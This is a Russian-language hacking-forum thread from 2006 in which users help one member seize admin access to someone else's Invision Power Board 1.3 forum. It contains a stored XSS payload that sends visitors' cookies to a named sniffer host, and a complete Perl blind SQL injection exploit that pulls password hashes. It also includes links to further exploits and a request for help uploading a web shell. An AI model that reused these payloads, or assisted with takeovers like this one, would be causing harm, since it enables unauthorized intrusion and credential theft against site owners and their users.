Форумы Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

Discussion in 'Уязвимости CMS/форумов' started by КИНГ, 21 Jun 2006.

  1. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    Вот есть форум данной версии. Админ на форум не заходит (нельзя украсть куки), но форум живет бурной жизнью. Надо получить доступ к нику админа или дать админские права конкретным пользователям. Кто что может сказать по этому поводу?
     
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Сделай на форум SQL injection
     
  3. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    пробовал. асю дай.
     
  4. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    #4 Gho_st, 21 Jun 2006
    Last edited: 23 Jun 2006
    2 people like this.
  5. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    асю кто нить оставте!
     
  6. genOK

    genOK Elder - Старейшина

    Joined:
    8 Apr 2006
    Messages:
    35
    Likes Received:
    1
    Reputations:
    0
    зачем тебе аська???
    реально попробуй сплойтом...
     
  7. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    _http://forum.antichat.ru/thread15678.html
    Надеюсь поможет
     
    1 person likes this.
  8. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Вот тебе великолепный сайт с ответом на твой вопрос:
    http://www.yandex.ru/yandsearch?stype=&nl=0&text=%E2%E7%EB%EE%EC+Invision+Power+Board%28U%29+v1.3+Final+
     
  9. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    Кинь мне в ПМ ссылку на форум попробую помочь
     
  10. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Или мне
     
  11. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    Посмотрел я форум...
    Сплоит (по крайней мере у меня) не работает...
    Зато есть XSS (Может админ проснется и заглотит его) Просто запости его как сообщение
    Code:
    [e*mail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    (Нужно убрать все *)
    Где http://antichat.ru/cgi-bin/s.jpg? Это ссылка на сниффер
    на данный момент куки должны прилететь сюда
    http://www.antichat.ru/sniff/log.php
    Советую создать свой собственный сниффер так как он более удобный чем паблик.
     
  12. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    http://rst.void.ru/download/r57ipb2.txt
     
  13. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    Я его и юзал
     
  14. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    PHP:
    #!/usr/bin/perl

    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2 
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com  /ipb202/ 1 1
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    use IO::Socket;

    if (@
    ARGV 4) { &usage; }

    $server    $ARGV[0];
    $path      $ARGV[1];
    $member_id $ARGV[2];
    $target    $ARGV[3];

    $pass = ($target)?('member_login_key'):('password');

    $server =~ s!(http:\/\/)!!;

    $request  'http://';
    $request .= $server;
    $request .= $path;

    $s_num 1;
    $|++;
    $n 0;

    print 
    "[~]    SERVER : $server\r\n";
    print 
    "[~]      PATH : $path\r\n";
    print 
    "[~] MEMBER ID : $member_id\r\n";
    print 
    "[~]    TARGET : $target";
    print ((
    $target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print 
    "\r\n";
    print 
    "[~] SEARCHING PASSWORD ... [|]";

    (
    $cmember_id $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

    while(
    1)
    {
    if(&
    found(47,58)==0) { &found(96,122); } 
    $char $i;
    if (
    $char=="0"
     { 
     if(
    length($allchar) > 0){
     print 
    qq{\b\b DONE 
     
     
    MEMBER ID $member_id
     
    };
     print ((
    $target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
     print 
    $allchar."\r\n";
     }
     else
     {
     print 
    "\b\b FAILED ]";
     }
     exit();  
     }
    else 
     {  
      
    $allchar .= chr($i);
     }
    $s_num++;
    }

    sub found($$)
     {
     
    my $fmin $_[0];
     
    my $fmax $_[1];
     if ((
    $fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
     
     
    $r int($fmax - ($fmax-$fmin)/2);
     
    $check " BETWEEN $r AND $fmax";
     if ( &
    check($check) ) { &found($r,$fmax); }
     else { &
    found($fmin,$r); }
     }
     
    sub crack($$)
     {
     
    my $cmin $_[0];
     
    my $cmax $_[1];
     
    $i $cmin;
     while (
    $i<$cmax)
      {
      
    $crcheck "=$i";
      if ( &
    check($crcheck) ) { return $i; }
      
    $i++;
      }
     
    $i 0;
     return 
    $i;
     }
     
    sub check($)
     {
     
    $n++;
     
    status();
     
    $ccheck $_[0];
     
    $pass_hash1 "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
     
    $pass_hash2 "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"
     
    $pass_hash3 $pass.",".$s_num.",1))".$ccheck.") /*";
     
    $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
     
    $nmalykh    "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";
     
    $socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80");

     
    printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
     
    $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
     
     while(<
    $socket>) 
      { 
      if (/
    Set-Cookiesession_id=0;/) { return 1; }
      } 

     return 
    0;
     }
     
    sub status()
    {
      
    $status $n 5;
      if(
    $status==0){ print "\b\b/]";  }
      if(
    $status==1){ print "\b\b-]";  }
      if(
    $status==2){ print "\b\b\\]"; }
      if(
    $status==3){ print "\b\b|]";  }
    }

    sub usage()
     {
     print 
    q(
     
    Invision Power Board v 2.0.4 SQL injection exploit
     
    ----------------------------------------------------
     
    USAGE:
     ~~~~~~
     
    r57ipb2.pl [server] [/folder/] [member_id] [target]
     
     [
    server]    - host where IPB installed
     
    [/folder/]  - folder where IPB installed
     
    [member_id] - user id for brute
     
     targets
    :
              
    IPB 1.*
              
    IPB 2.* (Prior To 2.0.4)
     
     
    e.gr57ipb2.pl 127.0.0.1 /IPB1 1
     
    ----------------------------------------------------
     (
    c)oded by 1dt.w0lf
     RST
    /GHC http://rst.void.ru , http://ghc.ru
     
    );
     exit();
     }
    Исправленный сплойт для похищения хэша.
     
  15. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    Барсик, а сообщение должно отправится пустое если все правильно будет?
     
  16. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    Если да, то что то не правильно после отпраки сообщение показывается так

    .com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
     
  17. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    137
    Likes Received:
    25
    Reputations:
    -1
    Если да, то что то не правильно после отпраки сообщение показывается так

    .com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
     
  18. firemen

    firemen New Member

    Joined:
    3 Jun 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Мужики, подскажите как шелл залить на 1.3 Final?
    Я так понял, что загрузку смайликов в коде админ выкинул, т.к. даже на добавление простого jpg выдает ошибку загрузки.
    что ещё можно придумать?
    если что пишити в личку, дам форум и пароль админа.
     
Loading...